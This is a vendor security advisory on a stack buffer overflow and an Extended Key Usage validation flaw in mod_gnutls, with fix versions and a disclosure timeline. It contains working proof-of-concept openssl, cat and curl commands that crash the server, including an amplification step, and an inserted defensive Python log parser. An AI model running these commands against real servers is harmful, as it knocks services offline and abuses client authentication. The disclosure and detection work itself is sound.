
mod_gnutls Multiple Vulnerabilities

High

Synopsis

Multiple vulnerabilities exist in mod_gnutls.

CVE-2026-33307 Stack-based Buffer Overflow in Client Certificate Chain Processing 

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H (7.5)

A client certificate chain with more than 8 certificates can cause a stack-based buffer overflow. The certificate chain does not need to lead to a trusted root, or even be a well-formed chain - the same certificate can be used multiple times.

Proof of Concept:

The following steps demonstrate the vulnerability on a Fedora 42 system running mod_gnutls 0.12.0.

1. The attacker generates a self-signed certificate:

openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -sha256 -days 365 -noenc -subj "/CN=self-signed-cert"

Please note there are no particular requirements for the contents of this certificate.

2. The attacker generates a malicious certificate chain by using 9 copies of the same certificate generated above:

cat cert.pem cert.pem cert.pem cert.pem cert.pem cert.pem cert.pem cert.pem cert.pem > malicious-cert-chain.pem

3. The attacker initiates an mTLS connection using the crafted certificate chain:

curl https://<hostname> -k --key key.pem --cert malicious-cert-chain.pem

4. The following entry can be found in the /var/log/httpd/error_log file on the server:

*** stack smashing detected ***: terminated

[...] [core:notice] [pid 1183:tid 1183] AH00051: child pid 3449 exit signal Abort (6), possible coredump in /etc/httpd

The above confirms that the stack-based buffer overflow was detected and the protections kicked in: the process was aborted, and a core dump was generated. This largely reduces this vulnerability to a transient DoS, thanks to the hardening.

The attack is easily amplified by making many requests at once:

curl https://<hostname> https://<hostname> https://<hostname> https://<hostname> -k --key key.pem --cert malicious-cert-chain.pem

This vulnerability can lead to a potential DoS through attacker-controlled CPU, memory and disk usage, despite the protections in place.
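As an added example (not part of the advisory, and not Tenable or mod_gnutls code), the following Python script parses Apache error_log entries of the shape shown above and reports how many worker aborts preceded by the stack-protector message fall inside a time window, which is the host-side signal a defender can alert on; the log sample, timestamps, pids and the AH00489 noise line are constructed for this example.

```python
import re
from datetime import datetime, timedelta

# Constructed sample of /var/log/httpd/error_log: the message texts match the
# advisory, the timestamps and pids are made up for this example.
SAMPLE_ERROR_LOG = """\
*** stack smashing detected ***: terminated
[Fri Mar 20 10:00:01.000000 2026] [core:notice] [pid 1183:tid 1183] AH00051: child pid 3449 exit signal Abort (6), possible coredump in /etc/httpd
[Fri Mar 20 10:00:05.000000 2026] [mpm_event:notice] [pid 1183:tid 1183] AH00489: Apache/2.4 configured -- resuming normal operations
*** stack smashing detected ***: terminated
[Fri Mar 20 10:00:07.000000 2026] [core:notice] [pid 1183:tid 1183] AH00051: child pid 3451 exit signal Abort (6), possible coredump in /etc/httpd
*** stack smashing detected ***: terminated
[Fri Mar 20 10:00:08.000000 2026] [core:notice] [pid 1183:tid 1183] AH00051: child pid 3452 exit signal Abort (6), possible coredump in /etc/httpd
*** stack smashing detected ***: terminated
[Fri Mar 20 10:00:09.000000 2026] [core:notice] [pid 1183:tid 1183] AH00051: child pid 3453 exit signal Abort (6), possible coredump in /etc/httpd
"""

STACK_SMASH = "*** stack smashing detected ***: terminated"
# Apache error_log entry written when an httpd worker dies with SIGABRT.
ABORT_RE = re.compile(
    r"^\[(?P<ts>[^\]]+)\] \[core:notice\] \[pid \d+:tid \d+\] "
    r"AH00051: child pid (?P<child>\d+) exit signal Abort \(6\)"
)
TS_FORMAT = "%a %b %d %H:%M:%S.%f %Y"


def parse_child_aborts(log_text):
    """Return (timestamp, child_pid, stack_smash) per aborted worker. The
    stack-protector line carries no timestamp, so it is attributed to the
    AH00051 line that immediately follows it."""
    events, prev_was_smash = [], False
    for line in log_text.splitlines():
        if line.strip() == STACK_SMASH:
            prev_was_smash = True
            continue
        m = ABORT_RE.match(line)
        if m:
            ts = datetime.strptime(m.group("ts"), TS_FORMAT)
            events.append((ts, int(m.group("child")), prev_was_smash))
        prev_was_smash = False
    return events


def max_aborts_in_window(events, window_seconds=60):
    """Peak number of worker aborts inside any window of window_seconds;
    a burst far above the host's baseline means the crash is being repeated."""
    window = timedelta(seconds=window_seconds)
    best = 0
    for i, (start, _, _) in enumerate(events):  # log order is chronological
        best = max(best, sum(1 for ts, _, _ in events[i:] if ts - start <= window))
    return best
```

Feed it the real error_log and compare the peak against a threshold tuned to the host's normal worker-restart rate.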

CVE-2026-33308 Improper Certificate Validation

CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:N/A:N (6.8)

A client certificate with an incorrect Extended Key Usage (EKU) is accepted. If an attacker compromises a certificate (together with its private key) that was issued for a different purpose (e.g. server authentication), they may be able to reuse it for mTLS client authentication.

Proof of Concept:

The attacker makes an HTTPS request using a separately acquired private key and certificate chain:

curl https://<hostname> -k --key key.pem --cert not-client-cert-chain.pem

Solution

CVE-2026-33307: Upgrade to version 0.12.3 / 0.13.0, or later.

CVE-2026-33308: Upgrade to version 0.13.0, or later.

Disclosure Timeline

February 25, 2026: Tenable sends request for contact.
March 2, 2026: mod_gnutls responds with PGP key.
March 4, 2026: Tenable sends disclosure.
March 14, 2026: mod_gnutls replies that patch is ready and would like to release next week.
March 17, 2026: Tenable replies with answers to questions.
March 18, 2026: mod_gnutls replies with proposed date and shares report.
March 19, 2026: Tenable acknowledges and agrees on date.
March 20, 2026: mod_gnutls publishes and lets Tenable know.

All information within TRA advisories is provided “as is”, without warranty of any kind, including the implied warranties of merchantability and fitness for a particular purpose, and with no guarantee of completeness, accuracy, or timeliness. Individuals and organizations are responsible for assessing the impact of any actual or potential security vulnerability.

Tenable takes product security very seriously. If you believe you have found a vulnerability in one of our products, we ask that you please work with us to quickly resolve it in order to protect customers. Tenable believes in responding quickly to such reports, maintaining communication with researchers, and providing a solution in short order.

For more details on submitting vulnerability information, please see our Vulnerability Reporting Guidelines page.

If you have questions or corrections about this advisory, please email [email protected]